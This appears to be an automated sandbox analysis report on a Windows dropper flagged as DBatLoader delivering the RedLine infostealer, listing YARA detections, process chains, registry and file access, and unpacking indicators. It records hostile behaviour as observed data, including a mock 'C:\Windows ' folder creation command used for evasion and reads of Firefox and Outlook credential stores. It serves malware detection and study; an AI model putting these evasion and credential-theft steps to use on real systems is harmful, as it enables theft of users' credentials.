Source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, ZTFEpdjP8zw.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WnRNxU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, 2njIk.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, I5ElxL.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, QQSiOsa4hPS.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, FdHU4eb83Z7.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: truesight.sys.0.dr	Binary string: \Device\Driver\
Source: truesight.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/9@4/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029F3458 GetLastError,FormatMessageA,

0_2_029F3458

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029D8F58 GetDiskFreeSpaceA,

0_2_029D8F58

Source: C:\Users\Public\Libraries\srcngmlC.pif

Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

5_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029EEF94 CoCreateInstance,

0_2_029EEF94

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029EA2E8 FreeResource,

0_2_029EA2E8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

File created: C:\Users\Public\Libraries\Clmgncrs.PIF

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "

Source: C:\Users\Public\Libraries\srcngmlC.pif	Command line argument: 08A	5_2_00413780
Source: C:\Users\Public\Libraries\srcngmlC.pif	Command line argument: 08A	5_2_00413780
Source: C:\Users\Public\Libraries\srcngmlC.pif	Command line argument: 08A	5_1_00413780
Source: C:\Users\Public\Libraries\srcngmlC.pif	Command line argument: 08A	8_2_00413780

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\srcngmlC.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\Public\Libraries\srcngmlC.pif	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\srcngmlC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\srcngmlC.pif

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Clmgncrs.PIF "C:\Users\Public\Libraries\Clmgncrs.PIF"
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Clmgncrs.PIF "C:\Users\Public\Libraries\Clmgncrs.PIF"
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ClmgncrsO.bat" "	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Process created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\srcngmlC.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Static file information: File size 1693184 > 1048576

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x128800

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr
Source:	Binary string: easinvoker.pdb source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
Source:	Binary string: _.pdb source: srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 5.2.srcngmlC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 8.2.srcngmlC.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\srcngmlC.pif	Unpacked PE file: 12.2.srcngmlC.pif.400000.3.unpack

Yara detected DBatLoader

Source: Yara match

File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe.29d0000.1.unpack, type: UNPACKEDPE

.NET source code contains method to dynamically call methods (often used by packers)

Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: srcngmlC.pif.0.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_029EFCD8

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: netutils.dll.0.dr	Static PE information: real checksum: 0x21402 should be: 0x2599d
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Static PE information: real checksum: 0x0 should be: 0x1aa11c
Source: Clmgncrs.PIF.0.dr	Static PE information: real checksum: 0x0 should be: 0x1aa11c

Source: easinvoker.exe.0.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: .....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ....
Source: netutils.dll.0.dr	Static PE information: section name: ......
Source: netutils.dll.0.dr	Static PE information: section name: /4
Source: netutils.dll.0.dr	Static PE information: section name: /19
Source: netutils.dll.0.dr	Static PE information: section name: /31
Source: netutils.dll.0.dr	Static PE information: section name: /45
Source: netutils.dll.0.dr	Static PE information: section name: /57
Source: netutils.dll.0.dr	Static PE information: section name: /70
Source: netutils.dll.0.dr	Static PE information: section name: /81
Source: netutils.dll.0.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A395F8 push 02A39685h; ret	0_2_02A3967D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029F008C push 029F00CFh; ret	0_2_029F00C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A28128 push 02A28154h; ret	0_2_02A2814C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029D66FC push 029D6757h; ret	0_2_029D674F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029D66FA push 029D6757h; ret	0_2_029D674F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029F063C push 029F067Fh; ret	0_2_029F0677
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2C67C push ecx; mov dword ptr [esp], edx	0_2_02A2C681
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A3872C push 02A3895Eh; ret	0_2_02A38956
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A28770 push 02A287CAh; ret	0_2_02A287C2
